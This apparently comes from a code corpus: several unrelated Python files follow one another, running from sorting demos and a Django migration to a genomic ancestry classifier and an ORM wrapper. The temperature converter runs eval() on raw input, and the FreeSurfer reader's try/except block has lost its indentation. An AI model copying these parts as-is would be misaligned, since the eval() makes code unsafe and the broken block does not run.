            arr[leftmark], arr[rightmark] = arr[rightmark], arr[leftmark]
    # place the pivot at its final sorted position
    arr[first], arr[rightmark] = arr[rightmark], arr[first]
    return rightmark
if __name__ == "__main__":
    # Smoke-test each sort on a small literal list and print the result.
    ###### Bubble Sort ######
    arr = [5, 3, 7, 2]
    bubble_sort(arr)
    print(arr)
    ###### Selection Sort ######
    # NOTE(review): both demos below call selection_sort2; selection_sort
    # itself is never exercised — possibly a typo in the original.
    arr2 = [5, 3, 7, 2]
    selection_sort2(arr2)
    print(arr2)
    arr3 = [5, 3, 7, 2]
    selection_sort2(arr3)
    print(arr3)
    ###### Insertation Sort ######
    arr4 = [3, 5, 4, 6, 8, 1, 2, 12, 41, 25]
    insertion_sort(arr4)
    print(arr4)
    ###### Shell Sort ######
    # NOTE(review): with shell_sort as originally written (float gap from
    # `len(arr)/2`) this call crashes under Python 3 — confirm the target
    # interpreter.
    arr5 = [3, 5, 4, 6, 8, 1, 2, 12, 41, 25]
    shell_sort(arr5)
    print(arr5)
    ###### Merge Sort ######
    arr6 = [11,2,5,4,7,56,2,23]
    merge_sort(arr6)
    print(arr6)
|
993,573 | e3c858e6806156560592d6cf7ad84af932c79d91 | """
Read hippocampal subfield volumes computed by Freesurfer and/or ASHS
https://sites.google.com/site/hipposubfields/home
https://surfer.nmr.mgh.harvard.edu/fswiki/HippocampalSubfields
>>> from freesurfer_volume_reader import ashs, freesurfer
>>>
>>> for volume_file in itertools.chain(
>>> ashs.HippocampalSubfieldsVolumeFile.find('/my/ashs/subjects'),
>>> freesurfer.HippocampalSubfieldsVolumeFile.find('/my/freesurfer/subjects')):
>>> print(volume_file.absolute_path)
>>> print(volume_file.subject, volume_file.hemisphere)
>>> print(volume_file.read_volumes_mm3())
>>> print(volume_file.read_volumes_dataframe())
"""
import abc
import os
import pathlib
import re
import typing
import warnings
import pandas
try:
from freesurfer_volume_reader.version import __version__
except ImportError: # pragma: no cover
__version__ = None
def parse_version_string(
    version_string: str,
) -> typing.Tuple[typing.Union[int, str], ...]:
    """Split a dotted version string into a tuple, converting purely
    numeric segments to int and leaving the rest as strings.

    Deprecated; emits a warning on every call.
    """
    warnings.warn(  # previously used in `__main__.concat_dataframes`
        "function `parse_version_string` is deprecated"
    )
    segments = version_string.split(".")
    return tuple(int(seg) if seg.isdigit() else seg for seg in segments)
def remove_group_names_from_regex(regex_pattern: str) -> str:
    """Strip ``?P<name>`` tags from *regex_pattern*, turning named groups
    ``(?P<name>...)`` into plain groups ``(...)``."""
    group_name_tag = re.compile(r"\?P<.+?>")
    return group_name_tag.sub("", regex_pattern)
class VolumeFile(metaclass=abc.ABCMeta):
    """Abstract wrapper around a single volume file on disk.

    Concrete subclasses set FILENAME_REGEX so that `find` can recognise
    their files while walking a subjects directory.
    """

    # filename pattern a concrete subclass uses to recognise its files
    FILENAME_REGEX: typing.Pattern[str] = NotImplemented

    @abc.abstractmethod
    def __init__(self, path: str) -> None:
        # resolve once to an absolute path so later reads are cwd-independent
        self._absolute_path = pathlib.Path(path).absolute()

    @property
    def absolute_path(self) -> str:
        """Absolute filesystem path of this volume file, as a string."""
        return str(self._absolute_path)

    @classmethod
    def find(
        cls, root_dir_path: str, filename_regex: typing.Optional[typing.Pattern] = None
    ) -> typing.Iterator["VolumeFile"]:
        """Recursively walk *root_dir_path* and yield an instance of *cls*
        for every file whose name matches *filename_regex* (defaults to
        ``cls.FILENAME_REGEX``)."""
        if filename_regex is None:
            filename_regex = cls.FILENAME_REGEX
        for dirpath, _, filenames in os.walk(root_dir_path):
            for filename in filter(filename_regex.search, filenames):
                yield cls(path=os.path.join(dirpath, filename))
class SubfieldVolumeFile(VolumeFile):
    """Volume file holding per-subfield volumes (mm^3); subclasses implement
    the readers for their specific on-disk format."""

    @abc.abstractmethod
    def read_volumes_mm3(self) -> typing.Dict[str, float]:
        """Return a mapping of subfield name -> volume in mm^3."""
        raise NotImplementedError()

    @abc.abstractmethod
    def read_volumes_dataframe(self) -> pandas.DataFrame:
        """Return the volumes as a pandas DataFrame."""
        raise NotImplementedError()

    def _read_volume_series(self) -> pandas.Series:
        # shared helper for subclasses: wrap read_volumes_mm3() in a Series
        # indexed by subfield name
        subfield_volumes = self.read_volumes_mm3()
        return pandas.Series(
            data=list(subfield_volumes.values()),
            name="volume_mm^3",
            index=pandas.Index(data=subfield_volumes.keys(), name="subfield"),
        )
|
993,574 | 2d9c0ddf86ca793636fe91b2d31fa6726f890f74 | #!/usr/bin/env python
# test is one way to improve quality.
# Perform operation test with small function unit.
# It is better to join parts that passed test.
# assert can be used to determine bool value.
# Demonstration of `assert`: a truthy argument passes silently, a falsy
# one raises AssertionError (the commented lines show the failing cases).
assert(True)
#assert(False)
# error occurs if argument of assert function is false. follow it.
# AssertionError
# character output can also be made by test.
assert True, 'Hello'
#assert False, 'World'
# AssertionError: World
# test with assert. follow it.
assert(5 in range(10))
#assert(11 in range(10))
#
#  File "./testing.py", line 24, in <module>
#    assert(11 in range(10))
# AssertionError
# testing arguments
def int_print(num):
    """Print *num* after asserting it is exactly an int (bool excluded,
    since type comparison is by identity)."""
    assert type(num) is int
    print(num)
# passing an int succeeds; the commented call with a string would raise
int_print(3)
#int_print("number")
#  File "./testing.py", line 34, in int_print
#    assert(type(num) == type(5))
# AssertionError
|
993,575 | fa43b422dbae615498fe8f6331a3937191013459 | #温度转换
'''
(1) 输入输出的摄氏度采用大写字母C开头,温度可以是整数或小数,如:C12.34指摄氏度12.34度;
(2) 输入输出的华氏度采用大写字母F开头,温度可以是整数或小数,如:F87.65指华氏度87.65度;
(3) 不考虑异常输入的问题,输出保留小数点后两位;
(4) 使用input()获得测试用例输入时,不要增加提示字符串。
'''
'''TempConvert.py'''
# Read one value like "C12.34" or "F87.65" and print the converted
# temperature with two decimals; any other prefix is rejected.
# NOTE(review): eval() on raw user input is unsafe — float(TempStr[1:])
# would suffice here; confirm before changing, since the exercise text
# above promises no malformed input.
TempStr = input()
if TempStr[0] in ['F']:
    # Fahrenheit -> Celsius
    C = (eval(TempStr[1:]) - 32)/1.8
    print("C{:.2f}".format(C))
elif TempStr[0] in ['C']:
    # Celsius -> Fahrenheit
    F = 1.8*eval(TempStr[1:]) + 32
    print("F{:.2f}".format(F))
else:
    print("输入格式错误")
|
993,576 | de1994db2d0f9c63e2ad8b642dbc02f3b4be7ab4 | #!/usr/local/bin/python3
# -*- coding:utf-8 -*-
"""
@author:
@file: 1389.py
@time: 2020/4/30 10:07
@desc:
"""
class Solution(object):
    def createTargetArray(self, nums, index):
        """
        Build the target array by inserting each value at its requested
        slot; later insertions shift earlier elements to the right.
        :type nums: List[int]
        :type index: List[int]
        :rtype: List[int]
        """
        target = []
        for pos, val in zip(index, nums):
            target.insert(pos, val)
        return target
# manual spot-checks of createTargetArray; only the single-element case runs
# a = Solution().createTargetArray([0,1,2,3,4],[0,1,2,2,1])
# b = Solution().createTargetArray([1,2,3,4,0],[0,1,2,3,0])
c = Solution().createTargetArray([1],[0])
# print(a)
# print(b)
print(c)
993,577 | bf3741ee6392603f19fff22886122826ce371f3f | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-03-23 02:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Relation, UserInput and
    UserStats tables. Do not edit by hand beyond what Django regenerates."""

    initial = True

    # depends on whichever user model settings.AUTH_USER_MODEL points to
    dependencies = [migrations.swappable_dependency(settings.AUTH_USER_MODEL)]

    operations = [
        migrations.CreateModel(
            name="Relation",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("type", models.CharField(max_length=50)),
                ("base_word", models.CharField(max_length=50)),
                ("input_word", models.CharField(max_length=50)),
                ("word_net_score", models.FloatField()),
                ("model_score", models.FloatField()),
            ],
        ),
        migrations.CreateModel(
            name="UserInput",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("round_number", models.IntegerField()),
                ("round_time", models.IntegerField()),
                ("word_score", models.FloatField()),
                ("challenge", models.BooleanField()),
                (
                    "relation",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to="NLP4CCB.Relation",
                    ),
                ),
                (
                    "user",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="UserStats",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("rounds_played", models.IntegerField()),
                ("total_score", models.FloatField()),
                (
                    "user",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        to=settings.AUTH_USER_MODEL,
                        unique=True,
                    ),
                ),
            ],
        ),
    ]
|
993,578 | 8dcbb99020cadb6e6fbdff3a7a7007b0dad61ca9 | from alignChannels import alignChannels
import numpy as np
from PIL import Image
# Problem 1: Image Alignment
# 1. Load images (all 3 channels)
# each .npy file holds one colour channel of the image as a 2-D numpy array
red = np.load('red.npy')
green = np.load('green.npy')
blue = np.load('blue.npy')
def ncc(array1, array2):  # NCC based alignment
    """Normalized cross-correlation between two arrays of equal size:
    dot(a, b) / (||a|| * ||b||) over the flattened values."""
    vec1 = array1.flatten()
    vec2 = array2.flatten()
    return np.dot(vec1, vec2) / (np.linalg.norm(vec1) * np.linalg.norm(vec2))
# accumulators for NCC scores over candidate shifts in [-30, +30]
ncc_blue_red_col = []
ncc_blue_green_col = []
ncc_blue_red_row = []
ncc_blue_green_row = []
red_updated = []
green_updated = []
red_col = []
red_row = []
green_col = []
green_row = []
# score every column (axis=1) shift of red/green against the blue reference
for i in range(0,61):
    ncc_val_red = ncc(np.roll(red,i-30,axis=1),blue)
    ncc_val_green = ncc(np.roll(green,i-30,axis=1),blue)
    ncc_blue_red_col.append(ncc_val_red)
    ncc_blue_green_col.append(ncc_val_green)
# apply the best-scoring column shift to each channel
red_col = np.roll(red,np.argmax(ncc_blue_red_col)-30,axis=1)
green_col = np.roll(green,np.argmax(ncc_blue_green_col)-30,axis=1)
# score every row (axis=0) shift the same way
for i in range(0,61):
    ncc_val_red = ncc(np.roll(red,i-30,axis=0),blue)
    ncc_val_green = ncc(np.roll(green,i-30,axis=0),blue)
    ncc_blue_red_row.append(ncc_val_red)
    ncc_blue_green_row.append(ncc_val_green)
red_row = np.roll(red,np.argmax(ncc_blue_red_row)-30,axis=0)
green_row = np.roll(green,np.argmax(ncc_blue_green_row)-30,axis=0)
# keep whichever axis' best shift scored higher, per channel
red_updated = red_row
green_updated = green_row
if max(ncc_blue_red_col)>max(ncc_blue_red_row):
    red_updated = red_col
if max(ncc_blue_green_col)>max(ncc_blue_green_row):
    green_updated = green_col
# 2. Find best alignment
rgbResult = alignChannels(blue,red_updated,green_updated)
# 3. save result to rgb_output.jpg (IN THE "results" FOLDER)
# NOTE(review): the file is actually written as 'hello.jpg' in the current
# directory, not rgb_output.jpg in results/ as the comment claims — confirm
# the intended output path.
img = Image.fromarray(rgbResult)
img.save('hello.jpg')
|
993,579 | cf6eaad8b31dc7ec3b4213568efa629b44176c97 | # Operator Overloading in Python ...!
# Behind the seen in Python
# print(f"Addition : {10+20}")
# # --or--
# print(f"Addition : {int.__add__(10, 20)}")
#
# print(f"Result : {'Santanu' + ' Banik'}")
# # --or--
# print(f"Result : {str.__add__('Santanu', ' Banik')}")
class OverloadOperator:
    """Wraps a single value and overloads ``+`` to combine the wrapped
    payloads with their own ``+`` (ints add, strings concatenate)."""

    def __init__(self, arg):
        self.Data = arg

    def __add__(self, other):
        """Combine this payload with *other*'s payload and return the result."""
        combined = self.Data + other.Data
        return combined
# demo: integer payloads add (100 + 200), string payloads concatenate
obj00 = OverloadOperator(100)
obj01 = OverloadOperator(200)
print(obj00 + obj01)
strObj00 = OverloadOperator("Santanu ")
strObj01 = OverloadOperator("Banik")
print(strObj00 + strObj01)
##########################################
class complex:  # NOTE(review): shadows the builtin `complex`; name kept for compatibility
    """Toy pair type demonstrating `+` operator overloading."""

    def __init__(self, arg00, arg01):
        self.arg00 = arg00
        self.arg01 = arg01

    # Overload '+' Operator: combine components pairwise, returning a tuple
    def __add__(self, other):
        return self.arg00 + other.arg00, self.arg01 + other.arg01

    def __str__(self):
        # Fix vs. original: __str__ returned a tuple, so str(obj) raised
        # "TypeError: __str__ returned non-string"; it must return a str.
        return "({}, {})".format(self.arg00, self.arg01)
# demo: numeric pairs add component-wise into a tuple
object00 = complex(10, 20)
object01 = complex(50, 60)
result = object00 + object01
# Behind the seen....in python ....
#
# object00 = complex(10, 20)  ==>  object00.arg00 = 10
#                                  object00.arg01 = 20
#____________________________________________________
# object01 = complex(50, 60)  ==>  object01.arg00 = 50
#                                  object01.arg01 = 60
#____________________________________________________
# object00 + object01  ==>  __add__(object00, object01):
#     return (object00.arg00 + object01.arg00, object00.arg01 + object01.arg01)
#     [(10 + 50), (20 + 60)]  ==>  (60, 80)
print(f"Result : {result}")
# string pairs concatenate component-wise
obj00 = complex("A", "B")
# obj00 = complex("A", "B")  ==>  obj00.arg00 = "A"
#                                 obj00.arg01 = "B"
obj01 = complex("Z", "Y")
# obj01 = complex("Z", "Y")  ==>  obj01.arg00 = "Z"
#                                 obj01.arg01 = "Y"
result00 = obj00 + obj01
print(f"Result : {result00}")
993,580 | 045a474868c5fa81e47f503ca445706a364a2b99 | import logging
import os
import re
import yaml
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, OneHotEncoder
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
def get_ancestry_to_color(ancestries):
    """Map each ancestry label in *ancestries* to a colour name, cycling
    through a fixed nine-colour palette in iteration order."""
    colors = ['red', 'blue', 'green', 'orange', 'purple', 'gray', 'black', 'pink', 'brown']
    return {
        ancestry: colors[position % len(colors)]
        for position, ancestry in enumerate(ancestries)
    }
def get_ancestry_vcf_df(vcf_fp, stop_on='#CHROM', keep_only=None):
    """Parse a VCF into a genotype DataFrame (samples as rows, variants as
    columns) plus the list of sample ids.

    Variant ids are built as CHROM:POS:REF:ALT; duplicate ids and any
    chromosome-X variants are dropped, and variants are sorted by id.

    NOTE(review): `keep_only` is accepted but never used in the body —
    callers pass it (see create_dfs); confirm whether filtering was meant
    to happen here.
    NOTE(review): the file handle is not closed if parsing raises; `header`
    is assigned but unused.
    """
    f = open(vcf_fp)
    line = ''
    header = ''
    # skip header lines until the column-header line (starts with stop_on)
    while True:
        line = f.readline()
        if line[:6] == stop_on:
            break
    # sample ids start at the 10th tab-separated column of the header line
    columns = line[1:].strip().replace('""', '').split('\t')[9:]
    index_data_tups = []
    already_seen = set()
    for i, line in enumerate(f):
        pieces = line.strip().split('\t')
        # variant id: CHROM:POS:REF:ALT; first occurrence wins on duplicates
        r_id = pieces[0] + ':' + pieces[1] + ':' + pieces[3] + ':' + pieces[4]
        if r_id not in already_seen:
            already_seen.add(r_id)
            index_data_tups.append((r_id, pieces[9:]))
    index_data_tups = sorted(index_data_tups, key=lambda x: x[0])
    # drop chromosome-X variants
    index_data_tups = [(i, ls) for i, ls in index_data_tups
                       if ':X:' not in i and ':chrX:' not in i]
    index, data = zip(*index_data_tups)
    data = np.asarray(data)
    df = pd.DataFrame(data=data, columns=columns, index=index)
    df.index.name = ''
    # transpose dataframe so samples are rows, mutations are columns
    df = df.transpose()
    # replace phased calls
    # df = df.replace(re.compile(r'^1\|0'), '0|1')
    sample_ids = list(df.index)
    f.close()
    return df, sample_ids
def get_ancestry_map(map_fp, super_population=True):
    """Read a 1000 Genomes panel file into {sample_id: ancestry}.

    The panel is tab-separated with a header row and four columns per line:
    sample id, (sub)population, super-population, gender.

    Args:
        map_fp (str): Path to the panel file.
        super_population (bool): Map to the super-population column when
            True, otherwise to the sub-population column.

    Returns:
        dict: sample id -> ancestry label.

    Fix vs. original: the file handle was opened and never closed; use a
    context manager so it is released even on parse errors.
    """
    ancestry_map = {}
    with open(map_fp) as f:
        f.readline()  # dump header
        for line in f:
            if super_population:
                sample_id, _, ancestry, _ = line.strip().split('\t')
            else:
                sample_id, ancestry, _, _ = line.strip().split('\t')
            ancestry_map[sample_id] = ancestry
    return ancestry_map
def get_columns_to_drop(df, max_missingness=.05):
    """Return the columns of *df* whose fraction of missing ('.|.') genotype
    calls exceeds *max_missingness*.

    Args:
        df (pandas.DataFrame): genotype calls, samples as rows.
        max_missingness (float): maximum tolerated missing-call fraction.

    Fix vs. original: the comparison hard-coded ``.05`` instead of using
    the *max_missingness* parameter, so the argument was silently ignored.
    """
    to_drop = []
    for column in df.columns:
        missing_count = sum(1 for value in df[column] if value == '.|.')
        if missing_count / df.shape[0] > max_missingness:
            to_drop.append(column)
    return to_drop
def create_dfs(thousand_genomes_vcf_fp, sample_vcf_fp, stats_dict=None):
    """Load the run-sample VCF and the 1000 Genomes VCF into genotype
    DataFrames (samples x variants), align the 1000 Genomes columns to the
    sample variant set, and drop variants with >5% missing calls in the
    run samples. Records before/after shape counts in *stats_dict* when
    one is supplied.

    Returns:
        (thousand_genomes_df, sample_df) tuple of pandas DataFrames.
    """
    sample_df, sample_ids = get_ancestry_vcf_df(sample_vcf_fp)
    # NOTE(review): keep_only is passed here but get_ancestry_vcf_df never
    # uses it, hence the trim-down fallback below — confirm intent.
    thousand_genomes_df, thousand_genomes_sample_ids = get_ancestry_vcf_df(thousand_genomes_vcf_fp,
                                                                           keep_only=sample_df.columns)
    if list(sample_df.columns) != list(thousand_genomes_df.columns):
        logging.warning(f'sample dataframe and thousand genomes dataframe do not have the same\
 variants: sample_df-{sample_df.shape}, thousand_genomes_df-{thousand_genomes_df.shape}. \
 trimming down.')
        thousand_genomes_df = thousand_genomes_df[sample_df.columns]
        logging.info(f'new thousand genomes shape is {thousand_genomes_df.shape}')
        # raise RuntimeError(f'sample dataframe and thousand genomes dataframe do not have the same\
        # variants: sample_df-{sample_df.shape}, thousand_genomes_df-{thousand_genomes_df.shape}')
    if stats_dict is not None:
        stats_dict['inputs_before_drop'] = {
            'thousand_genomes_num_samples': thousand_genomes_df.shape[0],
            'thousand_genomes_num_variants': thousand_genomes_df.shape[1],
            'run_num_samples': sample_df.shape[0],
            'run_num_variants': sample_df.shape[1]
        }
    # drop variants too often missing in the run samples (from BOTH frames)
    to_drop = get_columns_to_drop(sample_df, max_missingness=.05)
    if stats_dict is not None:
        stats_dict['percent_of_variants_dropped'] = len(to_drop) / sample_df.shape[1]
        stats_dict['num_variants_dropped'] = len(to_drop)
    thousand_genomes_df = thousand_genomes_df.drop(to_drop, axis=1)
    sample_df = sample_df.drop(to_drop, axis=1)
    if stats_dict is not None:
        stats_dict['inputs_after_drop'] = {
            'thousand_genomes_num_samples': thousand_genomes_df.shape[0],
            'thousand_genomes_num_variants': thousand_genomes_df.shape[1],
            'run_num_samples': sample_df.shape[0],
            'run_num_variants': sample_df.shape[1]
        }
    return thousand_genomes_df, sample_df
def create_target_df(thousand_genomes_df, thousand_genomes_panel_fp, return_map=True,
                     super_population=True):
    """Build the classification target: a one-column ('ancestry') DataFrame
    aligned to the rows (samples) of *thousand_genomes_df*.

    NOTE(review): `return_map` is accepted but never used — the function
    always returns both the DataFrame and the sample->ancestry dict.
    """
    # read in ancestries for samples
    sample_id_to_ancestry = get_ancestry_map(thousand_genomes_panel_fp,
                                             super_population=super_population)
    # grab our target variable
    ancestries = [sample_id_to_ancestry[sample_id] for sample_id in thousand_genomes_df.index]
    target_df = pd.DataFrame.from_dict({
        'ancestry': ancestries
    })
    target_df.index = thousand_genomes_df.index
    return target_df, sample_id_to_ancestry
def plot_components(pcs, sample_ids, sample_id_to_ancestry, n=5,
                    prefix='output', output_dir=os.getcwd()):
    """Scatter-matrix plot of the first *n* principal components, coloured
    by each sample's ancestry; saved as <prefix>.pdf and <prefix>.png in
    *output_dir*.

    NOTE(review): `output_dir=os.getcwd()` is evaluated once at import
    time, not per call — confirm that is intended.
    """
    labels = [f'PC{i}' for i in range(1, n + 1)]
    plotting_df = pd.DataFrame(data=pcs[:, :n], columns=labels)
    ancestry_to_color = get_ancestry_to_color(set(list(sample_id_to_ancestry.values())))
    colors = [ancestry_to_color[sample_id_to_ancestry[s_id]]
              for s_id in sample_ids]
    axs = pd.plotting.scatter_matrix(plotting_df, color=colors,
                                     figsize=(12,12), diagonal='kde')
    # strip axis ticks from every sub-plot for a cleaner matrix
    for subaxis in axs:
        for ax in subaxis:
            ax.xaxis.set_ticks([])
            ax.yaxis.set_ticks([])
    plt.savefig(os.path.join(output_dir, f'{prefix}.pdf'), dpi=300, figsize=(12,12))
    plt.savefig(os.path.join(output_dir, f'{prefix}.png'), dpi=300, figsize=(12,12))
def write_predictions_file(output_fp, sample_ids, predictions, probs, classes):
    """Write a TSV of per-sample predicted ancestry and class probabilities.

    Columns: sample_id, predicted_ancestry, then one probability column per
    entry of *classes* (same order as each row of *probs*).

    Fix vs. original: the output handle was never closed on error; use a
    context manager.
    """
    labels = ['probability_' + c for c in classes]
    with open(output_fp, 'w') as out_f:
        out_f.write('sample_id\tpredicted_ancestry\t' + '\t'.join(labels) + '\n')
        for s_id, prediction, probabilities in zip(sample_ids, predictions, probs):
            out_f.write(f'{s_id}\t{prediction}\t'
                        + '\t'.join([str(x) for x in probabilities]) + '\n')
def write_principle_components_file(sample_ids, pcs, output_fp):
    """Write one tab-separated row per sample: sample id followed by its
    principal-component coordinates.

    Fix vs. original: the file handle was not closed if a write raised;
    use a context manager.
    """
    with open(output_fp, 'w') as f:
        for sample_id, vals in zip(sample_ids, pcs):
            f.write(sample_id + '\t' + '\t'.join([str(x) for x in vals]) + '\n')
def run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
              test_size=.2, stats_dict=None, num_components=20, output_dir=os.getcwd()):
    """Train a one-hot + PCA + random-forest ancestry classifier on the
    1000 Genomes genotypes, score it on a held-out split, and predict
    ancestries for the run samples.

    Side effects: writes thousand_genomes.training.pcs,
    thousand_genomes.test.pcs, samples.pcs and predictions.tsv into
    *output_dir* (plus stats.yaml when *stats_dict* is given).

    NOTE(review): `output_dir=os.getcwd()` is evaluated once at import
    time, not per call — confirm that is intended.
    """
    X_train_df, X_test_df, y_train_df, y_test_df = train_test_split(
        thousand_genomes_df, target_df, test_size=test_size)
    if stats_dict is not None:
        stats_dict['model'] = {'test_split': test_size, 'num_pca_components': num_components}
    X_train, X_test = X_train_df.values, X_test_df.values
    # flatten the single-column target frames to 1-D label arrays
    y_train, y_test = (np.reshape(y_train_df.values, (y_train_df.shape[0],)),
                       np.reshape(y_test_df.values, (y_test_df.shape[0],)))
    # create one hot encoder (unknown genotypes in later data are ignored)
    genotype_encoder = OneHotEncoder(handle_unknown='ignore', sparse=False)
    genotype_encoder.fit(X_train)
    # actually transform
    X_train = genotype_encoder.transform(X_train)
    # do pca
    pca = PCA(n_components=num_components)
    pca.fit(X_train)
    X_train_pcs = pca.transform(X_train)
    # write your thousand genomes training pcs file
    write_principle_components_file(X_train_df.index, X_train_pcs, os.path.join(output_dir, 'thousand_genomes.training.pcs'))
    #plot_components(X_train_pcs, X_train_df.index, sample_id_to_ancestry, n=5, prefix='pc.thousand_genomes.training',
    #                output_dir=output_dir)
    # train random forest model on standardised PC coordinates
    scaler = StandardScaler()
    scaler.fit(X_train_pcs)
    X_train_pcs = scaler.transform(X_train_pcs)
    clf = RandomForestClassifier(n_estimators=100)
    clf.fit(X_train_pcs, y_train)
    score = clf.score(X_train_pcs, y_train)
    if stats_dict is not None:
        stats_dict['model']['training_score'] = float(score)
    # test our new model (same encoder/pca/scaler fitted on training data)
    X_test = genotype_encoder.transform(X_test)
    X_test_pcs = pca.transform(X_test)
    # write your thousand genomes test pcs file
    write_principle_components_file(X_test_df.index, X_test_pcs, os.path.join(output_dir, 'thousand_genomes.test.pcs'))
    #plot_components(X_test_pcs, X_test_df.index, sample_id_to_ancestry, n=5, prefix='pc.thousand_genomes.test',
    #                output_dir=output_dir)
    X_test_pcs = scaler.transform(X_test_pcs)
    score = clf.score(X_test_pcs, y_test)
    if stats_dict is not None:
        stats_dict['model']['test_score'] = float(score)
    # make predictions for the actual run samples
    samples_test = sample_df.values
    samples_test = genotype_encoder.transform(samples_test)
    X_test_pcs = pca.transform(samples_test)
    # write your sample pcs file
    write_principle_components_file(sample_df.index, X_test_pcs, os.path.join(output_dir, 'samples.pcs'))
    X_test_pcs = scaler.transform(X_test_pcs)
    predictions = clf.predict(X_test_pcs)
    probs = clf.predict_proba(X_test_pcs)
    classes = clf.classes_
    sample_id_to_predicted_ancestry = {s_id:p for s_id, p in zip(sample_df.index, predictions)}
    #plot_components(X_test_pcs, sample_df.index, sample_id_to_predicted_ancestry, n=5,
    #                prefix='pc.samples', output_dir=output_dir)
    write_predictions_file(os.path.join(output_dir, 'predictions.tsv'),
                           sample_df.index, predictions, probs, classes)
    if stats_dict is not None:
        with open(os.path.join(output_dir, 'stats.yaml'), 'w') as outfile:
            yaml.dump(stats_dict, outfile, default_flow_style=False)
def preform_ancestry_analysis(thousand_genomes_vcf_fp, sample_vcf_fp, thousand_genomes_panel_fp,
                              output_dir=os.getcwd()):
    """Full pipeline: load/align the VCFs, then train and run the ancestry
    model twice — once against super-populations and once against
    sub-populations — writing results under output_dir/{super,sub}_population.

    NOTE(review): the name is a typo for "perform" but is part of the
    module's public API, so it is left unchanged.
    """
    stats_dict = {}
    thousand_genomes_df, sample_df = create_dfs(thousand_genomes_vcf_fp, sample_vcf_fp,
                                                stats_dict=stats_dict)
    target_df, sample_id_to_ancestry = create_target_df(thousand_genomes_df,
                                                        thousand_genomes_panel_fp, super_population=True)
    # make population directory
    super_population_dir = os.path.join(output_dir, 'super_population')
    sub_population_dir = os.path.join(output_dir, 'sub_population')
    if not os.path.isdir(super_population_dir):
        os.mkdir(super_population_dir)
    if not os.path.isdir(sub_population_dir):
        os.mkdir(sub_population_dir)
    run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
              test_size=.2, stats_dict=stats_dict, num_components=20, output_dir=super_population_dir)
    # run for sub populations
    target_df, sample_id_to_ancestry = create_target_df(thousand_genomes_df,
                                                        thousand_genomes_panel_fp, super_population=False)
    run_model(thousand_genomes_df, sample_df, target_df, sample_id_to_ancestry,
              test_size=.2, stats_dict=stats_dict, num_components=20, output_dir=sub_population_dir)
|
993,581 | becc961e03b9ac78178e8dab8f61075f1e99f8a0 | first_employee = int(input())
second_employee = int(input())
third_employee = int(input())
people = int(input())
total_per_employee = first_employee + second_employee + third_employee
hours = 0
while people > 0:
people -= total_per_employee
hours += 1
if hours % 4 == 0:
hours += 1
print(f"Time needed: {hours}h.") |
993,582 | 49a39518ddf2725882de584368f2ae0be357ea09 | from django.contrib import admin
from .models import Soft, Category
admin.site.register(Soft)
admin.site.register(Category)
|
993,583 | cdc23d86ae907d52c34461233fd0cbea4d7adecb | # -*- coding: utf-8 -*-
# Copyright (C) 1994-2019 Altair Engineering, Inc.
# For more information, contact Altair at www.altair.com.
#
# Commercial License Information:
#
# For a copy of the commercial license terms and conditions,
# go to: (http://www.pbspro.com/UserArea/agreement.html)
# or contact the Altair Legal Department.
#
# Use of Altair’s trademarks, including but not limited to "PBS™",
# "PBS Professional®", and "PBS Pro™" and Altair’s logos is subject
# to Altair's trademark licensing policies.
"""
ORMs Library (uses sqlalchemy).
Provide API's to communicate with the Reporting Database(PostgreSQL).
Classes:
* BaseORMLib: Base class for database-related operations
using sqlalchemy.
* Helpers: Helper class for for utility functions.
"""
from datetime import datetime
from sqlalchemy import create_engine, desc
from sqlalchemy.engine.url import URL
from sqlalchemy.orm import sessionmaker
from sqlalchemy.exc import ProgrammingError, OperationalError
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.sql import text
from sqlalchemy.schema import CreateSchema
from psycopg2.sql import SQL, Identifier
from .exceptions import DatabaseError
BASE = declarative_base()
class BaseORMLib(object):
"""
Deal with database: provide API's for database connection, etc.
Attributes:
*tables (dict) : Dictionary holding the table name mapped to their table class.
*config (dict) : The configuration object for database communication.
*schema (str) : String object holding the schema name.
*create (bool) : Flag used to specify whether to attempt to create table and schema.
*connection_retries(int): Number of times to try connecting to database before
exception is thrown.
Methods:
* _create: Creates schema and table if the don't exist.
* _create_table: Creates table if they don't exist.
* _create_schema: Creates schema if they don't exist.
* _database_engine: Creates a engine from the database configs provided.
* _set_session: Creates a new session which is used to communicate with the
database.
* _reset_session: Closes the old session and creates a new session.
* _commit: Commits changes to the database.
* _rollback: Rolls back the changes in case any exception is encountered.
* _close: Close the Reporting database connection.
* _insert: Performs insert within a transaction.
* _is_session_valid: Checks the session is valid or not.
* _merge_by_query: Performs merge based on the query dictionary.
"""
# pylint: disable=too-few-public-methods
def __init__(self, tables, views, config, schema=None, connection_retries=2):
"""Connect to database, create tables and schema if needed."""
# pylint: disable=too-many-arguments
self.__no_of_retries = connection_retries
self._set_database_engine(config)
self._set_session()
self.exschema = schema
if not self._is_session_valid():
self._reset_session()
if not self._create(tables, views, schema, config):
raise DatabaseError.TableCreationError("Table creation failed. Check logs!")
def _create(self, tables, views, schema_name, config):
"""
Create tables and schemas if they don't exist.
Args:
tables (dict): Dictionary holding the table name mapped to their table class.
{
<table_name_1>: <table_class instance>,
<table_name_2>: <table_class instance>
}
schema_name (str/None): String object holding the schema name.
Returns:
success (bool): True -> if the table and schema creation was successful or
they already exist.
False -> if exception was triggered during table or schema
